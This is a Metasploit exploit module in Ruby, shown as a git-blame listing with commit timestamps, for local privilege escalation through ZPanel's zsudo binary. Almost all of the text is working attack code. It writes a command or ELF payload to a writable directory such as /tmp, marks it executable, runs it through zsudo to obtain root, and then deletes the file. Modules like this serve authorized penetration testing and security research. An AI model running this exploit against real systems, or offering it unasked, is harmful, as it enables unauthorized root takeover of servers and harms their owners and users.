2013-06-23 16:00:39 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-06-23 16:00:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
require 'msf/core/exploit/exe'
|
|
|
|
|
|
|
|
|
2016-03-07 19:19:48 +00:00
|
|
|
class Metasploit4 < Msf::Exploit::Local
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = ExcellentRanking
|
2013-06-23 16:00:39 +00:00
|
|
|
|
2013-09-05 18:41:25 +00:00
|
|
|
include Msf::Exploit::EXE
|
|
|
|
include Msf::Post::File
|
2013-06-23 16:00:39 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info, {
|
|
|
|
'Name' => 'ZPanel zsudo Local Privilege Escalation Exploit',
|
|
|
|
'Description' => %q{
|
|
|
|
This module abuses the zsudo binary, installed with zpanel, to escalate
|
|
|
|
privileges. In order to work, a session with access to zsudo on the sudoers
|
|
|
|
configuration is needed. This module is useful for post exploitation of ZPanel
|
|
|
|
vulnerabilities, where typically web server privileges are acquired, and this
|
|
|
|
user is allowed to execute zsudo on the sudoers file.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'sinn3r', 'juan vazquez' ],
|
|
|
|
'DisclosureDate' => 'Jun 07 2013',
|
2013-09-24 17:33:31 +00:00
|
|
|
'Platform' => %w{ linux unix },
|
2013-08-30 21:28:54 +00:00
|
|
|
'Arch' => [ ARCH_CMD, ARCH_X86 ],
|
|
|
|
'SessionTypes' => [ 'shell', 'meterpreter' ],
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Command payload', { 'Arch' => ARCH_CMD } ],
|
|
|
|
[ 'Linux x86', { 'Arch' => ARCH_X86 } ]
|
|
|
|
],
|
|
|
|
'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
}
|
|
|
|
))
|
|
|
|
register_options([
|
|
|
|
# These are not OptPath becuase it's a *remote* path
|
|
|
|
OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
|
|
|
|
OptString.new("zsudo", [ true, "Path to zsudo executable", "/etc/zpanel/panel/bin/zsudo" ]),
|
|
|
|
], self.class)
|
|
|
|
end
|
2013-06-23 16:00:39 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def check
|
|
|
|
if file?(datastore["zsudo"])
|
|
|
|
return CheckCode::Detected
|
|
|
|
end
|
2013-06-23 16:00:39 +00:00
|
|
|
|
2014-01-21 23:14:55 +00:00
|
|
|
return CheckCode::Safe
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2013-06-23 16:00:39 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def exploit
|
|
|
|
if (target.arch.include? ARCH_CMD)
|
|
|
|
exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.sh"
|
|
|
|
# Using this way of writing the payload to avoid issues when failing to find
|
|
|
|
# a command on the victim for writing binary data
|
|
|
|
cmd_exec "echo \"#{payload.encoded.gsub(/"/, "\\\"")}\" > #{exe_file}"
|
|
|
|
else
|
|
|
|
exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
|
|
|
|
write_file(exe_file, generate_payload_exe)
|
|
|
|
end
|
2013-06-23 16:00:39 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
cmd_exec "chmod +x #{exe_file}"
|
2013-06-23 16:00:39 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Running...")
|
2013-06-23 16:00:39 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
begin
|
|
|
|
cmd_exec "#{datastore["zsudo"]} #{exe_file} #{rand_text_alpha(3 + rand(5))}"
|
|
|
|
ensure
|
|
|
|
cmd_exec "rm -f #{exe_file}"
|
|
|
|
end
|
2013-06-23 16:00:39 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2013-06-23 16:00:39 +00:00
|
|
|
end
|
|
|
|
|